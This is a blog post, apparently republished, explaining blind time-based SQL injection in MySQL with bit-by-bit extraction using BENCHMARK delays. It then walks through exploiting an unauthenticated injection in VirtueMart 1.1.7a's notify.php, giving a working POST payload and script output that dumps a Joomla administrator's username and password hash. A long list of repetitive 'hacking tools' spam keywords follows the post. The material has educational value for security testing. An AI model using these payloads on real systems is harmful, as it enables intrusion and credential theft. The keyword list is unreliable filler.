Sunday, August 23, 2020

Bit Banging Your Database

This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work just fine. For instance when dealing with a blind time based sql injection. To bring anyone who is not aware of what a "blind time based" sql injection is up to speed - this is a condition where it is possible to inject into a sql statement that is executed by the database, but the application gives no indication about the result of the query. This is normally exploited by injecting boolean statements into a query and making the database pause for a determined about of time before returning a response. Think of it as playing a game "guess who" with the database.

Now that we have the basic idea out of the way we can move onto how this is normally done and then onto the target of this post. Normally a sensitive item in the database is targeted, such as a username and password. Once we know where this item lives in the database we would first determine the length of the item, so for example an administrator's username. All examples below are being executed on an mysql database hosting a Joomla install. Since the example database is a Joomla web application database, we would want to execute a query like the following on the database:
select length(username) from jos_users where usertype = 'Super Administrator';
Because we can't return the value back directly we have to make a query like the following iteratively:

select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
select if(length(username)=2,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
We would keep incrementing the number we compare the length of the username to until the database paused (benchmark function hit). In this case it would be 5 requests until our statement was true and the benchmark was hit. 

Examples showing time difference:
 mysql> select if(length(username)=1,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.00 sec)
mysql> select if(length(username)=5,benchmark(5000000,md5('cc')),0) from jos_users where usertype = 'Super Administrator';
1 row in set (0.85 sec)
Now in the instance of the password, the field is 65 characters long, so it would require 65 requests to discover the length of the password using this same technique. This is where we get to the topic of the post, we can actually determine the length of any field in only 8 requests (up to 255). By querying the value bit by bit we can determine if a bit is set or not by using a boolean statement again. We will use the following to test each bit of our value: 

Start with checking the most significant bit and continue to the least significant bit, value is '65':
value & 128 
01000001
10000000
-----------
00000000 

value & 64
01000001
01000000
-----------
01000000
value & 32
01000001
00100000
-----------
00000000
value & 16
01000001
00010000
--------
00000000
value & 8
01000001
00001000
--------
00000000

value & 4
01000001
00000100
-----------
00000000
value & 2
01000001
00000010
-----------
00000000
value & 1
01000001
00000001
-----------
00000001
The items that have been highlighted in red identify where we would have a bit set (1), this is also the what we will use to satisfy our boolean statement to identify a 'true' statement. The following example shows the previous example being executed on the database, we identify set bits by running a benchmark to make the database pause:

mysql> select if(length(password) & 128,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)
mysql> select if(length(password) & 64,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (7.91 sec)

mysql> select if(length(password) & 32,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 16,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 8,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 4,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 2,benchmark(50000000,md5('cc')),0) from jos_users;
1 row in set (0.00 sec)

mysql> select if(length(password) & 1,benchmark(50000000,md5('cc')),0)  from jos_users;
1 row in set (8.74 sec)
As you can see, whenever we satisfy the boolean statement we get a delay in our response, we can mark that bit as being set (1) and all others as being unset (0). This gives us 01000001 or 65. Now that we have figured out how long our target value is we can move onto extracting its value from the database. Normally this is done using a substring function to move through the value character by character. At each offset we would test its value against a list of characters until our boolean statement was satisfied, indicating we have found the correct character. Example of this:

select if(substring(password,1,1)='a',benchmark(50000000,md5('cc')),0) as query from jos_users;
This works but depending on how your character set that you are searching with is setup can effect how many requests it will take to find a character, especially when considering case sensitive values. Consider the following password hash:
da798ac6e482b14021625d3fad853337skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
If you searched for this string a character at a time using the following character scheme [0-9A-Za-z] it would take about 1400 requests. If we apply our previous method of extracting a bit at a time we will only make 520 requests (65*8). The following example shows the extraction of the first character in this password:

mysql> select if(ord(substring(password,1,1)) & 128,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 64,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 32,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.93 sec)
mysql> select if(ord(substring(password,1,1)) & 16,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 8,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 4,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (7.91 sec)
mysql> select if(ord(substring(password,1,1)) & 2,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
mysql> select if(ord(substring(password,1,1)) & 1,benchmark(50000000,md5('cc')),0) from jos_users;1 row in set (0.00 sec)
Again I have highlighted the requests where the bit was set in red. According to these queries the value is 01100100 (100) which is equal to 'd'. The offset of the substring would be incremented and the next character would be found until we reached the length of the value that we found earlier.

Now that the brief lesson is over we can move on to actually exploiting something using this technique. Our target is Virtuemart. Virtuemart is a free shopping cart module for the Joomla platform. Awhile back I had found an unauthenticated sql injection vulnerability in version 1.1.7a. This issue was fixed promptly by the vendor (...I was amazed) in version 1.1.8. The offending code was located in "$JOOMLA/administrator/components/com_virtuemart/notify.php" :


          if($order_id === "" || $order_id === null)
          {
                        $vmLogger->debug("Could not find order ID via invoice");
                        $vmLogger->debug("Trying to get via TransactionID: ".$txn_id);
                       
$qv = "SELECT * FROM `#__{vm}_order_payment` WHERE `order_payment_trans_id` = '".$txn_id."'";
                        $db->query($qv);
                        print($qv);
                        if( !$db->next_record()) {
                                $vmLogger->err("Error: No Records Found.");
                        }
The $txn_id variable is set by a post variable of the same name. The following example will cause the web server to delay before returning:


POST /administrator/components/com_virtuemart/notify.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
invoice=1&txn_id=1' or benchmark(50000000,md5('cc'));#  
Now that an insertion point has been identified we can automate the extraction of the "Super Administrator" account from the system:
python vm_own.py "http://192.168.18.131/administrator/components/com_virtuemart/notify.php"
[*] Getting string length
[+] username length is:5
[+] username:admin
[*] Getting string length
[+] password length is:65
[+] password:da798ac6e482b14021625d3fad853337:skxuqNW1GkeWWldHw6j1bFDHR4Av5SfL
The "vm_own.py" script can be downloaded here.


Related word
  1. Pentest Tools Tcp Port Scanner
  2. Hacker Tools 2020
  3. Hack App
  4. Pentest Tools For Windows
  5. Best Pentesting Tools 2018
  6. Pentest Tools For Android
  7. Hack And Tools
  8. Usb Pentest Tools
  9. Hacking Tools For Beginners
  10. Best Hacking Tools 2020
  11. Hacking Tools For Pc
  12. Hacker Tools Windows
  13. Pentest Tools Website Vulnerability
  14. Usb Pentest Tools
  15. Beginner Hacker Tools
  16. Hacking Tools Name
  17. Kik Hack Tools
  18. Pentest Tools Alternative
  19. Hacks And Tools
  20. World No 1 Hacker Software
  21. Top Pentest Tools
  22. Hacker
  23. Pentest Tools Url Fuzzer
  24. Pentest Tools Github
  25. Pentest Tools Nmap
  26. Nsa Hacker Tools
  27. Hack Website Online Tool
  28. What Are Hacking Tools
  29. Hacking Tools Mac
  30. What Are Hacking Tools
  31. Pentest Tools Alternative
  32. Hacker Tools Software
  33. Hack Rom Tools
  34. Hacking Tools Name
  35. Pentest Tools Kali Linux
  36. Hacking Tools Usb
  37. Hacking Tools Usb
  38. Growth Hacker Tools
  39. Pentest Tools Review
  40. Ethical Hacker Tools
  41. Hacking Tools Mac
  42. Hacker Tools For Mac
  43. Hacking Tools And Software
  44. Hacker Hardware Tools
  45. Pentest Tools For Mac
  46. Wifi Hacker Tools For Windows
  47. Pentest Tools For Windows
  48. Best Pentesting Tools 2018
  49. Pentest Tools Port Scanner
  50. Termux Hacking Tools 2019
  51. Hacking Tools For Kali Linux
  52. Hack Tools For Mac
  53. Pentest Tools Review
  54. Pentest Tools Android
  55. Hacker Tools Mac
  56. Hack Website Online Tool
  57. Pentest Tools For Ubuntu
  58. Hacker Tools 2019
  59. Hacker Tools For Ios
  60. New Hack Tools
  61. Hacking Tools For Pc
  62. Hackers Toolbox
  63. Growth Hacker Tools
  64. Hacking Tools Online
  65. How To Hack
  66. Pentest Tools Framework
  67. Hacking Tools For Mac
  68. Pentest Tools Download
  69. Hacking Tools For Windows
  70. Install Pentest Tools Ubuntu
  71. Hack Tools For Mac
  72. Pentest Tools Port Scanner
  73. Hacker Tools For Windows
  74. Hackrf Tools
  75. Pentest Tools Port Scanner
  76. Nsa Hack Tools
  77. Hacker Tools For Ios
  78. Hacking Tools For Windows Free Download
  79. Hacking Tools For Pc
  80. Hacking Tools
  81. Pentest Tools Website Vulnerability
  82. Hacking Tools Github
  83. Pentest Tools Windows
  84. Best Pentesting Tools 2018
  85. Hacker Tools For Pc
  86. Ethical Hacker Tools
  87. Hacking Tools Mac
  88. Computer Hacker
  89. Top Pentest Tools
  90. Hack Apps
  91. New Hack Tools
  92. Pentest Tools Free
  93. Hacker Tools Apk
  94. Free Pentest Tools For Windows
  95. Usb Pentest Tools
  96. Pentest Tools Website
  97. Pentest Tools Apk
  98. Hack Tools Online
  99. Underground Hacker Sites
  100. Hacking Tools Windows
  101. Install Pentest Tools Ubuntu
  102. How To Install Pentest Tools In Ubuntu
  103. Hacker Tools Github
  104. What Are Hacking Tools
  105. Hacker
  106. Pentest Tools
  107. Best Hacking Tools 2020
  108. Bluetooth Hacking Tools Kali
  109. Hack Tools Pc
  110. Hacker Tools List
  111. How To Hack
  112. Hacking Tools For Windows Free Download
  113. Hacking Tools For Pc
  114. Hacker Tools For Windows
  115. Pentest Tools Find Subdomains
  116. World No 1 Hacker Software
  117. Pentest Tools Github
  118. Hacking Tools For Beginners
  119. Hacks And Tools
  120. How To Install Pentest Tools In Ubuntu
  121. Hacking Tools For Windows

No comments: